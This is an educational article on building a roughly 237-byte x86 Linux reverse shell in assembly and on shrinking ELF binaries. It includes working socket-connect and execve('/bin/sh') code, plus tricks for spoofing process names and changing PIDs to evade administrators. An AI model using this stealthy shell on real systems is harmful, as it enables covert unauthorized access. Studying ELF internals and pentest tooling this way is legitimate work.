Reverse shell of 237 bytes. How to shrink an executable file using Linux hacks

Once I was asked: is it possible to write a reverse shell some 200 bytes in size? This shell should perform the following functions: change its name and PID on a regular basis, make you coffee, and hack the Pentagon… Too bad, this is most likely impossible. But the task seemed interesting and challenging to me. Let’s see whether it can be implemented.

What for?

Plenty of small reverse shells are available on the Internet: tiny shell (https://github.com/creaktive/tsh/blob/master/tsh.c), prism, and others. Reverse shells written in C are only tens to hundreds of kilobytes in size. So, what’s the point of creating another one?

The point is simple. This is an educational article: similar to the development of kernel rootkits, which is one of the most intuitive ways to understand the structure of the Linux kernel, writing a reverse shell with additional functionality and restrictions on the executable file size enables you to explore some unexpected Linux features, including those related to ELF files, their loading and execution, resource inheritance in child processes, and linker operations. Along the way, plenty of exciting discoveries and curious hacks await you. And in the end, you will get a bonus: an operational tool that you can additionally refine, polish, and use in pentesting. Let’s start!

info

The resultant program is available on GitHub.

warning

All information provided in this article is intended for educational purposes only. Neither the author nor the Editorial Board can be held liable for any damages caused by improper usage of this publication.

Terms of reference

In addition to the connection to a given port on a given host, your reverse shell must support the following functions:

  • set its name at startup (to be less detectable);
  • change the process identifier on a regular basis (to be more elusive); and 
  • be as small as possible (to make your task more interesting).

First, you have to select the language. Since one of your main goals is to reduce the binary size, two options come to mind: C and assembly. Indeed, C makes it possible to create tiny (by modern standards) Hello Worlds (about 17 KB with dynamic linking and ~800 KB with static linking, vs. 2 MB in Go); however, as you probably know, when you compile C code, additional code is generated. This code is responsible for:

  • execution of global constructors and destructors, if any;
  • correct passing of arguments to main(); and 
  • transferring control from __libc_start_main() to main().

Constructors and destructors

Functions registered as constructors and destructors are called before and after main(), respectively. They are referenced from separate sections (for example, .init_array holds pointers to the constructors), unlike the ‘normal’ code, which is simply stored in .text. Such functions are used, among other things, for various initializations in shared libraries or to set buffering parameters in apps interacting over the network (e.g. in CTF tasks). To register a function this way, specify __attribute__ ((constructor)) or __attribute__ ((destructor)) in its definition.

In some cases, the sections storing these functions can be named .ctors/.init/.init_array and .dtors/.fini/.fini_array. Generally speaking, all of them perform the same function, and their differences are irrelevant for the purposes of this article. More information on global constructors and destructors can be found on wiki.osdev.org.
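For illustration, here is a minimal C sketch of the two attributes (the function and variable names are hypothetical). The constructor runs before main() and, as in the CTF-style use case mentioned above, turns off stdout buffering; the destructor runs after main() returns. None of this is needed in the reverse shell: it only shows the kind of ‘harness’ a C binary carries around.

```c
#include <assert.h>
#include <stdio.h>

/* Set by the constructor so that main() can observe that it already ran. */
static int ctor_ran = 0;

/* Runs before main(); a pointer to it is placed in .init_array (or .ctors). */
__attribute__((constructor))
static void before_main(void) {
    ctor_ran = 1;
    setvbuf(stdout, NULL, _IONBF, 0);   /* unbuffered stdout, as in many CTF tasks */
}

/* Runs after main() returns (or after exit() is called). */
__attribute__((destructor))
static void after_main(void) {
    fputs("destructor: main() is over\n", stderr);
}
```

Running readelf -S on the compiled program should list the .init_array and .fini_array sections that reference these two functions.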

Also, the output executable file may contain sections with debugging and other information (e.g. symbol names, compiler version, etc.); this information isn’t directly required for its execution and operation, but it increases the file size, sometimes significantly. Such sections will be discussed in more detail a little later.

This ‘harness’ is inextricably linked with C binaries (at least in Linux). But for your purposes, this is just ballast to be mercilessly disposed of. Therefore, your reverse shell should be written in the great and terrible assembly language (of course, for x86). The plan is as follows: first, you write operational code and then you start reducing its size.

Coding

I suggest using NASM. You can take the simplest asm reverse shell as a basis. In my humble opinion, 32-bit code is preferable: instructions in this mode are shorter, and you don’t lose any required functionality, since your primary objective is to connect to the server and run the shell; the shell itself will then run in 64-bit mode (on an x86_64 system).

The code must perform the following operations:

  • at startup, the reverse shell changes its argv[0] (the program arguments are displayed by ps and htop);
  • it also changes its short name (displayed by the top utility);
  • then it tries to connect to the server. If the attempt fails, a child process is created, the parent terminates, the child waits for the timeout, and the connection attempt is repeated; and 
  • on successful connection, the reverse shell runs /bin/sh whose stdin, stdout, and stderr are redirected to the socket connected to the server. The process name is spoofed as well.

So, what then is my name to you?

In Linux, there are two ‘entities’ that store the name associated with a process. Let’s call them ‘full’ and ‘short’ names. Both can be accessed via /proc: the full one is in /proc/<pid>/cmdline; while the short one, in /proc/<pid>/comm (comm for command).

According to its description, the short name contains the name of the executable file without the path to it. This name is stored in the kernel structure task_struct describing the process (in kernel terms, task), and its length is limited to 16 characters, including the null byte.

The full name contains the program arguments (i.e. *argv[]): the name of the executable file as it was specified at startup is stored in the zeroth element while the passed arguments (if any), in the rest of the elements.

It’s pretty easy to change the short name. You can use the prctl() system call for this purpose. With prctl(), a process or thread can perform various operations with its name, privileges (capabilities), memory areas, seccomp mode, etc. The number of the required operation is passed as the first argument followed by the rest of the parameters whose number can vary. You are interested in the operation PR_SET_NAME where the pointer to the new name is passed as the second argument. However, if the name, including the null byte, is longer than 16 characters, it will be truncated.

In other words, to change the short name, you have to call prctl(PR_SET_NAME, NEW_ARGV), where NEW_ARGV is the address of the new name. The following code does this:

mov eax, 0xac ; NR_PRCTL
mov ebx, 15 ; PR_SET_NAME
mov ecx, NEW_ARGV
int 0x80 ; syscall interrupt
...
NEW_ARGV:
db "s0l3g1t", 0
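For comparison, the same operation in C goes through the prctl() wrapper from <sys/prctl.h>. The sketch below (the helper names are hypothetical) also reads the name back with PR_GET_NAME to show the 16-byte limit: anything beyond 15 characters is silently cut off.

```c
#include <assert.h>
#include <string.h>
#include <sys/prctl.h>

/* Set the short name (shown by top and in /proc/self/comm). The kernel keeps
 * at most 15 characters plus the terminating NUL and drops the rest. */
static int set_short_name(const char *name) {
    return prctl(PR_SET_NAME, (unsigned long)name, 0UL, 0UL, 0UL);
}

/* Read the short name back; buf must hold at least 16 bytes. */
static int get_short_name(char *buf) {
    return prctl(PR_GET_NAME, (unsigned long)buf, 0UL, 0UL, 0UL);
}
```

After set_short_name("s0l3g1t"), reading /proc/<pid>/comm of that process should print s0l3g1t.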

info

Plenty of useful information about system calls can be found in man 2 syscall. It also contains two tables covering the architectures and ABIs supported by Linux: for each of them, they list the instruction used to make a system call and the registers used to pass arguments and return values. Note that these conventions differ from the calling conventions used for ordinary functions in user-mode apps (at least on x86).

Now you can rewrite argv[0]. The following piece of code does roughly what memcpy(argv[0], NEW_ARGV, strlen(NEW_ARGV) + 1) would do in C (the code assumes that [esp] already holds argv[0], i.e. the address of the program name string):

mov edi, [esp] ; edi = argv[0] (address of the name string)
mov esi, NEW_ARGV
mov ecx, _start - NEW_ARGV ; ecx = strlen(NEW_ARGV) + NULL-byte
_name_loop:
movsb ; edi[i] = esi[i] ; i+=1
loop _name_loop
...
NEW_ARGV:
db "s0l3g1t", 0
_start:
...

The address of the original name (argv[0]) is placed in edi (destination index register), the address of the new name ("s0l3g1t") in esi (source index register), and its length, including the null byte, in ecx. However, it turns out that if the original argv[0] ("./asm_shell") was longer than the new one, the ps output will look as follows, despite the terminating null byte.

ps output when the zeroth argument is overwritten ‘explicitly’
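The effect can be reproduced without ps. The sketch below is a simplified model (an assumption, not procps source code; the function names are hypothetical) of how ps turns /proc/<pid>/cmdline into a line of text: the whole original argument region is shown, and NUL separators are displayed as spaces. The copy function does what the movsb loop does: it writes the new name and its null byte and leaves the rest of the old name alone.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Simplified model of ps: the whole argument region is shown, with each
 * NUL separator printed as a space. out must hold len + 1 bytes. */
static void render_cmdline(const char *buf, size_t len, char *out) {
    while (len > 0 && buf[len - 1] == '\0')     /* drop the final terminator(s) */
        len--;
    for (size_t i = 0; i < len; i++)
        out[i] = (buf[i] == '\0') ? ' ' : buf[i];
    out[len] = '\0';
}

/* What the movsb loop does: copy the new name and its NUL, nothing more. */
static void naive_overwrite(char *argv0, const char *new_name) {
    memcpy(argv0, new_name, strlen(new_name) + 1);
}
```

With "./asm_shell" as the original argv[0], the model displays s0l3g1t ell: the leftover tail of the old name shows up as a fake second argument.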

That’s not good. Let’s try to fill it with zeros first and then overwrite it.

ps output when the zeroth argument is zeroed and then overwritten

That’s better: the ps output contains nothing suspicious! But there is still some room for improvement. What does the manual say? According to man 5 proc (subsection /proc/[pid]/cmdline):

Furthermore, a process may change the memory location that this file refers via prctl(2) operations such as PR_SET_MM_ARG_START.

In addition to the PR_SET_MM_ARG_START option, man 2 prctl describes PR_SET_MM_ARG_END (both are available starting from Linux 3.5). The latter seems to be exactly what you need! Too bad: to perform prctl() operations affecting the process memory, you need the CAP_SYS_RESOURCE capability (otherwise it would be too easy!). And to grant it, superuser rights are required…

For the same reason, if you ‘explicitly’ replace the address of the argv[] string array on the stack, this won’t change the contents of /proc/[pid]/cmdline: Linux stores the start and end addresses of the memory region holding the process arguments, and it’s the content of this particular region that is displayed. The same is true for environment variables (/proc/[pid]/environ). That is why xxd still displays the zeros that fill the rest of the original argv[0].

Let’s assume that your reverse shell is always run on behalf of a regular user, and there is no way to grant the CAP_SYS_RESOURCE privilege to it. Therefore, you simply fill the entire original argv[0] with zeroes and then overwrite it with your own one. How often does one check the process name in /proc using xxd?
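In C terms, the approach described above (zero the whole old argv[0], then overwrite it) could look like the following sketch; the function name is hypothetical. Unlike the asm loop, which always copies the full new name, this version also truncates the new name if it is longer than the original argv[0], so the write never spills into the next argument or the environment. That check is an addition of this sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: wipe the original argv[0] completely, then write the
 * new name into it. The new name is truncated to the original length so that
 * nothing past the old terminating NUL is touched. Returns the number of
 * characters written (without the NUL). */
static size_t spoof_argv0(char *argv0, const char *new_name) {
    size_t room = strlen(argv0);        /* characters available in place */
    size_t n = strlen(new_name);
    if (n > room)
        n = room;
    memset(argv0, 0, room);             /* step 1: zero the old name */
    memcpy(argv0, new_name, n);         /* step 2: copy the new one */
    return n;                           /* argv0[room] is still the old NUL */
}
```

In a real program, you would call it as spoof_argv0(argv[0], "s0l3g1t") at the start of main().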

Now all you have to do is find out how to spoof the name /bin/sh (because after calling execve() to run the shell, its *argv[] will show /bin/sh to the admin in the ps and htop outputs and in /proc/<pid>/cmdline). Fortunately, this problem is easy to solve: you just pass your own argv[0] to this syscall as the second argument. Keep in mind that the passed pointer points to an array of arguments (strings) that must be terminated with a null pointer. Therefore, before pushing the NEW_ARGV address onto the stack, 0 must be pushed there:

xor eax, eax
push dword 0x0068732f ; push "/sh"
push dword 0x6e69622f ; push /bin (="/bin/sh")
mov ebx, esp ; ebx = ptr to "/bin/sh" into ebx
push edx ; edx = 0x00000000
mov edx, esp ; **envp = edx = ptr to NULL address
push ebx ; pointer to /bin/sh
push 0
push NEW_ARGV
mov ecx, esp ; ecx points to shell's argv[0] ( &NEW_ARGV )
mov al, 0xb
int 0x80 ; execve("/bin/sh", &{ NEW_ARGV, 0 }, 0)

But now you cannot change the short name with prctl(): execve() resets it to the name of the executed file (sh), and from a shell you cannot make system calls directly. However, there are other interesting ways to do this.
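The argv[0] trick can be checked from C as well. In this sketch (the helper name is hypothetical), a child process runs /bin/sh with a spoofed argv[0] and an empty environment, like the shellcode above. To make the result observable without ps, it additionally passes -c and a short script: POSIX sh sets $0 to argv[0] when no command name follows the script, so the script can test which name the shell believes it has. The shellcode itself passes only { NEW_ARGV, NULL }.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: run /bin/sh with a fake argv[0] and an empty
 * environment, wait for it, and return its exit status (-1 on failure). */
static int run_sh_as(const char *fake_name, const char *script) {
    char *const argv[] = { (char *)fake_name, "-c", (char *)script, NULL };
    char *const envp[] = { NULL };      /* as in the shellcode: envp -> NULL */
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve("/bin/sh", argv, envp);
        _exit(127);                     /* reached only if execve() failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Here, run_sh_as("s0l3g1t", "test \"$0\" = s0l3g1t") exits with 0, confirming that the shell sees the spoofed name rather than /bin/sh.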

Starting over

To connect to a server, you have to create a socket, fill the struct sockaddr structure containing the address to connect to, and connect to it.

A socket is a communication endpoint in Linux; it doesn’t necessarily represent a network connection (unix and netlink sockets, for example, don’t). When you create a socket, you must specify the address family or the protocol family it will belong to (currently, the AF_* constants are just aliases of the PF_* ones), the socket type (stream, datagram, raw, etc.), and the protocol (it depends on the family, see man 5 protocols). In this particular case, you need a stream (TCP, SOCK_STREAM) internet socket (the AF_INET family), and the protocol will be selected automatically when you pass 0:

mov al, 0x66 ; 0x66 = 102 = socketcall()
push ebx ; 3rd arg: socket protocol = 0
mov bl, 0x1 ; ebx = 1 = socket() function
push byte 0x1 ; 2nd arg: socket type = 1 (SOCK_STREAM)
push byte 0x2 ; 1st arg: socket domain = 2 (AF_INET)
mov ecx, esp ; copy stack structure's address to ecx (pointer)
int 0x80 ; eax = socket(AF_INET, SOCK_STREAM, 0)

info

On some platforms, including x86_32, a single system call, socketcall(), is used for socket functions instead of separate syscalls socket(), bind(), connect(), etc.; its first argument is the number of the required function. These numbers are defined in the Linux kernel headers (include/uapi/linux/net.h).
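Since the stack grows downward, the socket() arguments are pushed in reverse order, and after the last push, esp (copied to ecx) points to an array that starts with the first argument. This is exactly the array socketcall() receives. The following C model of a 32-bit stack is purely illustrative (the stack32 type and the function names are hypothetical); it mirrors the three push instructions above.

```c
#include <assert.h>
#include <stdint.h>
#include <sys/socket.h>

/* Toy model of an i386 stack: 32-bit slots, growing toward index 0. */
struct stack32 {
    uint32_t mem[64];
    unsigned esp;               /* index of the current top slot */
};

/* push: decrement esp first, then store, like the CPU does. */
static void push32(struct stack32 *s, uint32_t v) {
    assert(s->esp > 0);         /* no stack overflow in this toy */
    s->mem[--s->esp] = v;
}

/* Same order as the asm: protocol, type, domain. Returns what ecx gets. */
static const uint32_t *push_socket_args(struct stack32 *s, uint32_t domain,
                                        uint32_t type, uint32_t protocol) {
    push32(s, protocol);        /* push ebx      ; 3rd arg */
    push32(s, type);            /* push byte 0x1 ; 2nd arg */
    push32(s, domain);          /* push byte 0x2 ; 1st arg */
    return &s->mem[s->esp];     /* mov ecx, esp */
}
```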

The struct sockaddr structure is a kind of ‘base class’ for the address definitions of various protocols. It has only two fields:

/* Structure describing a generic socket address. */
struct sockaddr {
    unsigned short sa_family;   /* Common data: address family and length. */
    char sa_data[14];           /* Address data. */
};

The value of the first field must match the family of the previously created socket. The second field describes the address the socket will be associated with. As you know, different protocols have different address formats, including sockaddr_in/sockaddr_in6 (internet sockets), sockaddr_un (unix sockets), etc. But all of them are a kind of wrappers for the sockaddr structure and can be easily cast to the sockaddr type to support a single API for socket functions. For instance, sockaddr_in divides the sa_data field into an IP address and a port number, thus, leaving eight unused bytes (see also man 7 ip):

struct sockaddr_in {
    sa_family_t    sin_family;  /* address family: AF_INET */
    in_port_t      sin_port;    /* port in network byte order */
    struct in_addr sin_addr;    /* internet address */
    unsigned char  sin_zero[8]; /* Pad to size of 'struct sockaddr' */
};
/* Internet address */
struct in_addr {
    uint32_t s_addr;            /* address in network byte order */
};

Your objective is to correctly form this structure on the stack and pass its address to connect(). As said above, the port (REV_PORT) and the IP address (REV_IP) in this structure must be in network byte order (i.e. big-endian, most significant byte first). The code below calls connect(socketfd, addr, sizeof(addr)), where socketfd was obtained earlier:

mov al, 0x66 ; 0x66 = 102 = socketcall()
push dword REV_IP ; Remote IP address
push word REV_PORT ; Remote port
push word 0x0002 ; sin_family = 2 (AF_INET)
mov ecx, esp ; ecx = ptr to *addr structure
push byte 16 ; addr_len = 16 (structure size)
push ecx ; push ptr of args structure
push ebx ; ebx = socketfd
mov bl, 0x3 ; ebx = 3 = connect()
mov ecx, esp ; save esp into ecx, points to socketfd
int 0x80 ; eax = connect(socketfd, *addr[2, PORT, IP], 16) = 0 on success
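To find the values to substitute for REV_IP and REV_PORT, you can let C do the byte-order work. This sketch (the helper names and the 127.0.0.1:4444 example are hypothetical) fills a struct sockaddr_in with htons() and inet_pton() and reads the fields back as native integers. On a little-endian x86 host, those integers are the immediates that push dword and push word must use so that the bytes land on the stack in network order.

```c
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <assert.h>
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>

/* Fill sockaddr_in the way the shellcode lays it out on the stack. */
static int make_addr(struct sockaddr_in *sa, const char *ip, uint16_t port) {
    memset(sa, 0, sizeof *sa);                  /* sin_zero stays zeroed */
    sa->sin_family = AF_INET;
    sa->sin_port = htons(port);                 /* network byte order */
    return inet_pton(AF_INET, ip, &sa->sin_addr) == 1 ? 0 : -1;
}

/* Network-order fields read as native integers: on little-endian x86, these
 * are the immediates for "push dword REV_IP" and "push word REV_PORT". */
static uint32_t rev_ip_imm(const struct sockaddr_in *sa) { return sa->sin_addr.s_addr; }
static uint16_t rev_port_imm(const struct sockaddr_in *sa) { return sa->sin_port; }
```

For 127.0.0.1:4444, this gives REV_IP = 0x0100007f and REV_PORT = 0x5c11.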

If the connection attempt fails, the reverse shell should try again after a while. This is simple: you check the return code received in eax; on a successful connection, it’s 0; on error, it’s a negative error code (-errno, e.g. -ECONNREFUSED). Prior to a new connection attempt, the reverse shell must create a child process and terminate the parent so that its PID changes. Important: it’s the child process that sleeps. For simplicity, you can set the timeout to five seconds (although a random value varying in a certain range would be better).
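Here is how the same retry logic could look in C; this is a sketch with hypothetical names, not the article’s code. Note that the libc connect() wrapper reports failure as -1 with the error in errno, whereas the raw system call used by the shellcode returns the negated error code in eax. After each failure, the process forks; the parent exits, and the child, which now has a new PID, sleeps and retries.

```c
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <assert.h>
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>

/* One connection attempt: returns a connected socket, or -1. */
static int try_connect(const char *ip, uint16_t port) {
    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &sa.sin_addr) != 1)
        return -1;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    if (connect(fd, (struct sockaddr *)&sa, sizeof sa) < 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Retry loop: on failure, fork; the parent exits (taking the old PID with it),
 * the child sleeps and tries again. Returns only in the descendant that
 * finally connects. */
int connect_with_respawn(const char *ip, uint16_t port, time_t delay) {
    for (;;) {
        int fd = try_connect(ip, port);
        if (fd >= 0)
            return fd;
        pid_t pid = fork();
        if (pid > 0)
            _exit(0);                   /* parent: leave */
        /* child (or fork failure: keep going with the current PID) */
        struct timespec req = { .tv_sec = delay, .tv_nsec = 0 };
        nanosleep(&req, NULL);          /* rem = NULL, as in the shellcode */
    }
}
```

The caller would then redirect stdin, stdout, and stderr to the returned socket and run the shell.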

Sleeping requires a bit more effort. You cannot just call sleep(5): there is no such system call, and the syscall you need, nanosleep(), takes two pointers to structures: the first one describes the sleep duration, while the second one receives the remaining time if the sleep was interrupted (e.g. by an incoming signal):

int nanosleep(const struct timespec *req, struct timespec *rem);

However, the manual claims that rem can be equal to NULL, which is good. All you have to do is write to the req structure the seconds and nanoseconds during which the function should sleep:

struct timespec {
    time_t tv_sec;   /* goes to 'long int' */
    long   tv_nsec;
};

Both numbers belong to the long int type that occupies 4 bytes on x86_32. So, you have to fill the structure and make the syscall as shown below (and clean up the stack afterwards):

mov eax, NR_NANOSLEEP
push dword 0 ; nsec
push dword 5 ; sec (the five-second timeout)
mov ebx, esp ; ebx = struct timespec *req
xor ecx, ecx ; ecx = struct timespec *rem = NULL
int 0x80
add esp, 8 ; cleanup

The output should be as follows.

Sleeping, changing name, never giving up!
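The role of the second nanosleep() argument is easier to see in C. The sketch below (sleep_for() is a hypothetical helper) uses rem the way the manual intends: if a signal interrupts the sleep, nanosleep() fails with EINTR and stores the remaining time, which is fed back in as the next request. The shellcode simply passes NULL and accepts that an interrupted sleep ends early, which is harmless for a retry timer.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <errno.h>
#include <time.h>

/* Sleep for sec + nsec, resuming after signal interruptions. */
static int sleep_for(time_t sec, long nsec) {
    struct timespec req = { .tv_sec = sec, .tv_nsec = nsec };
    struct timespec rem;
    while (nanosleep(&req, &rem) == -1) {
        if (errno != EINTR)
            return -1;      /* e.g. EINVAL if nsec is outside 0..999999999 */
        req = rem;          /* continue with whatever time is left */
    }
    return 0;
}
```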

Diet for an elf

Congrats! You’ve got an operational reverse shell! What’s its size? If you build the binary using nasm -f elf32 asm_shell.asm -o asm_shell.o && ld asm_shell.o -o asm_shell -m elf_i386, it will be some 5 KB.

5 KB... Is this a lot or a little?

info

This article is largely inspired by a tutorial with a self-explanatory subtitle: Size Is Everything (also available on GitHub). The idea is to get rid of everything unnecessary in an ELF file, examining the ELF file format and Linux internals along the way, and still end up with an operational binary. That program does nothing except exit with code 42. Spoiler: the author managed to squeeze it from the initial 4 KB down to 45 bytes!

So, your shell is currently 4912 bytes in size. Time to examine its ‘elven’ nature.

Building a tiny elf

Any pentester familiar with C knows that programs written in this language start with main(), since gcc expects this function to be in the code. In fact, it’s not quite so: the execution of an executable file starts from the entry point, which is usually the _start() function responsible for the preliminary preparation and the transfer of control to main().

You assemble the .asm file using NASM, and it produces a ‘relocatable’ ELF file (normally, such files have the .o extension). Relocatable ELF files are produced when a project is built from several source files according to the scheme “one source – one relocatable ELF” (by the way, the sources can be written in more than one language).

Relocatable ELF files contain sections with data and code that can be linked against other files to create an executable binary. Actually, this is what the linker does. In this particular case, this is ld. It expects a function named _start to be present in one of the input files to make it the entry point.

A hollow inside

After executing the above commands, you get a file where the code (the .text section) starts at physical offset 0x1000 (the offset in the file on disk). This suspiciously resembles the page size, and apart from the headers at the very beginning, everything before it is filled with zeros. This padding takes almost 4 KB, which is totally unacceptable!

In the beginning was the Matrix

Let’s see which linker options are responsible for this. Judging by the description of the -n option (Do not page align data), this is exactly what you need.

Removing page alignment

912 bytes! Much better. The code now starts at physical offset 0x60. What’s next? Time has come to play with the sections.

info

You can review the history of commits to examine the source code at different development stages.

Who needs those SHTs?

SHT stands for Section Header Table (more often, you will see just “section table” or “section headers”). It describes all sections in the file, and you can view it by running readelf -S.

Sections of your reverse shell

Where do the other sections come from, given that the source code had only the .text section? Remember how the executable file was built. For instance, to enable ld to find the _start() function, information about it must be stored somewhere: in the symbol table of the .o file, i.e. in the .symtab and .strtab sections.

Information about symbols in the relocatable elf

As you can see, all the labels specified in the source code are present there. But an executable file doesn’t have to contain a symbol table. Therefore, you can apply the strip command to it or use the linker option -s to get rid of the symbols. However, if you ‘strip’ symbols from a relocatable file, the linker won’t be able to find the entry point and build an executable ELF, which is logical. Overall, this trick reduces the size by a little more than half (to be specific, by 468 bytes).

Reverse shell without information about symbols

Moreover, the correct operation of a binary doesn’t require the information about its sections at all! The most straightforward way to remove the section table from the executable file is to use the command dd if=./asm_shell of=./asm_shell_trunc bs=1 count=<N>. Fortunately, the section table is located at the end of the file, so this operation isn’t difficult. In this particular case, it starts at offset 0x130 (304).

Preparing the file for surgery

But to get rid of the information indicating that there were sections in the file, you should not only cut off the SHT at the end of it, but also fill the fields in the ELF file header containing the offset of the section table, the size of its records, and their number (e_shoff, e_shentsize, and e_shnum in ElfN_Ehdr, respectively) with zeroes. In the above screenshot, these fields are underlined. For detailed instructions on how to get rid of section headers, see the article ELF – No Section Header? No Problem; also see the Oracle blog for more information about the sections.
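The header patch can also be scripted. The following C sketch (the function name is hypothetical) works on a 32-bit ELF image loaded into memory: it checks that the section header table really is the last thing in the file, zeroes e_shoff, e_shentsize, and e_shnum (plus e_shstrndx, which also refers to the section table), and returns the new length, i.e. the count to pass to dd.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>
#include <string.h>

/* Returns the truncated length, or 0 if the image is not a 32-bit ELF or
 * its section header table is not located at the very end of the file. */
static size_t drop_section_headers(unsigned char *img, size_t len) {
    Elf32_Ehdr eh;
    if (len < sizeof eh)
        return 0;
    memcpy(&eh, img, sizeof eh);
    if (memcmp(eh.e_ident, ELFMAG, SELFMAG) != 0 || eh.e_ident[EI_CLASS] != ELFCLASS32)
        return 0;
    size_t sht_end = (size_t)eh.e_shoff + (size_t)eh.e_shentsize * eh.e_shnum;
    if (eh.e_shoff == 0 || sht_end != len)
        return 0;                   /* no SHT, or something follows it */
    size_t new_len = eh.e_shoff;    /* everything from here on is the SHT */
    eh.e_shoff = 0;
    eh.e_shentsize = 0;
    eh.e_shnum = 0;
    eh.e_shstrndx = 0;              /* SHN_UNDEF: no section name table */
    memcpy(img, &eh, sizeof eh);
    return new_len;
}
```

Writing back only the first new_len bytes of the buffer corresponds to the dd step plus the manual header edit.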

info

The structure of an ELF header is shown in this diagram. I strongly recommend reviewing it if you have read this far. Just keep in mind that it depicts a 32-bit ELF: in a 64-bit one, the address and offset fields are 8 bytes long instead of 4.
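If you would rather not squint at a diagram, glibc’s <elf.h> describes the same structures, and the compiler can confirm the offsets that matter for the header tricks used later in this article. The checks below are compile-time assertions: if the file compiles, the layout is as stated.

```c
#include <assert.h>
#include <elf.h>
#include <stddef.h>

/* 32-bit header: 52 bytes; the fields reused later sit at these offsets. */
_Static_assert(sizeof(Elf32_Ehdr) == 52, "Elf32_Ehdr is 52 bytes");
_Static_assert(EI_ABIVERSION == 8 && EI_PAD == 9, "e_ident bytes 8 and 9");
_Static_assert(offsetof(Elf32_Ehdr, e_shoff) == 32, "e_shoff at 32");
_Static_assert(offsetof(Elf32_Ehdr, e_flags) == 36, "e_flags at 36");
_Static_assert(offsetof(Elf32_Ehdr, e_phnum) == 44, "e_phnum at 44");
_Static_assert(offsetof(Elf32_Ehdr, e_shentsize) == 46, "e_shentsize at 46");
_Static_assert(offsetof(Elf32_Ehdr, e_shstrndx) == 50, "e_shstrndx at 50");
_Static_assert(sizeof(Elf32_Phdr) == 32, "Elf32_Phdr is 32 bytes");

/* 64-bit header: addresses and offsets grow to 8 bytes, so fields shift. */
_Static_assert(sizeof(Elf64_Ehdr) == 64, "Elf64_Ehdr is 64 bytes");
_Static_assert(sizeof(Elf32_Off) == 4 && sizeof(Elf64_Off) == 8, "offset width");
```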

Now your reverse shell is 304 bytes in size. Is it possible to reduce it further?

‘Compressing’ instructions

This trick is well known to pentesters who have to write shellcode for buffers of limited size. The point is that different x86 instructions have different lengths, and the same thing can often be expressed in assembly language in different ways. Below is one of my favorite examples.

Three bytes vs. seven bytes

Review your code from this perspective. Of course, its readability will most likely deteriorate, but this won’t affect the shell’s workability in any way! First of all, don’t write small numbers directly into registers. In this particular case, these are mostly system call numbers.

Wasted space

Replacing instructions like mov REG, IMM with push IMM; pop REG really helps with syscalls that have small numbers; however, for numbers greater than 0x7f, push IMM takes 5 bytes instead of two, and pop REG adds one more byte. As you can see, the addresses used in the reverse shell are much greater than this value; therefore, if you try to save on them this way, you will lose more than you gain. In some cases, instead of placing 1 into a register directly, you can simply increment it (important: don’t forget to zero it first). Just compare!

Placing 1 into ebx
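To see where the bytes go, here is a tiny hand-written encoder for the two variants (hypothetical helpers, not part of NASM). mov r32, imm32 is always B8+r followed by four immediate bytes. push has a short form, 6A ib, whose byte is sign-extended, which is why it only works up to 0x7f, and a long form, 68 id; pop r32 is the single byte 58+r.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* x86 register numbers used in the opcode byte (B8+r, 58+r). */
enum reg32 { R_EAX, R_ECX, R_EDX, R_EBX, R_ESP, R_EBP, R_ESI, R_EDI };

/* Store v as 4 little-endian bytes, as x86 immediates are encoded. */
static void put32(uint8_t *out, uint32_t v) {
    for (int i = 0; i < 4; i++)
        out[i] = (uint8_t)(v >> (8 * i));
}

/* mov r32, imm32 -> B8+r id: always 5 bytes. */
static size_t enc_mov_imm(uint8_t *out, enum reg32 r, uint32_t imm) {
    out[0] = (uint8_t)(0xB8 + r);
    put32(out + 1, imm);
    return 5;
}

/* push imm ; pop r32 -> 3 bytes if imm fits a sign-extended byte, else 6. */
static size_t enc_push_pop(uint8_t *out, enum reg32 r, uint32_t imm) {
    size_t n;
    if (imm <= 0x7f || imm >= 0xffffff80u) {
        out[0] = 0x6A;                  /* push imm8 (sign-extended) */
        out[1] = (uint8_t)imm;
        n = 2;
    } else {
        out[0] = 0x68;                  /* push imm32 */
        put32(out + 1, imm);
        n = 5;
    }
    out[n] = (uint8_t)(0x58 + r);       /* pop r32 */
    return n + 1;
}
```

For socketcall (0x66), push/pop takes 3 bytes instead of 5; for prctl (0xac), it takes 6, one more than the plain mov.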

Also, you don’t need some of the register initialization instructions because, on Linux, the general-purpose registers are already zeroed when the program starts (the kernel does this, although the ABI doesn’t guarantee it). The specific number of nanoseconds to sleep and the exit code for unsuccessful connection attempts can be neglected as well, and the corresponding instructions removed. The way you push the sockaddr_in structure onto the stack can also be made shorter: instead of using two separate instructions for the address family and the port number (which together occupy 4 bytes in the structure), you can push them onto the stack at once.
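The combined immediate can be computed rather than assembled by hand. In this sketch (the helper name and port 4444 are hypothetical), sin_family goes into the low 16 bits and the network-order port into the high 16 bits, so that on little-endian x86 a single push dword leaves 02 00 followed by the two port bytes on the stack.

```c
#define _POSIX_C_SOURCE 200809L
#include <arpa/inet.h>
#include <assert.h>
#include <netinet/in.h>
#include <stdint.h>
#include <string.h>
#include <sys/socket.h>

/* Immediate for one "push dword" covering sin_family and sin_port.
 * Assumes a little-endian host (x86): the low half lands first in memory. */
static uint32_t family_port_imm(uint16_t port) {
    return (uint32_t)AF_INET | ((uint32_t)htons(port) << 16);
}
```

For port 4444, the instruction becomes push dword 0x5c110002.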

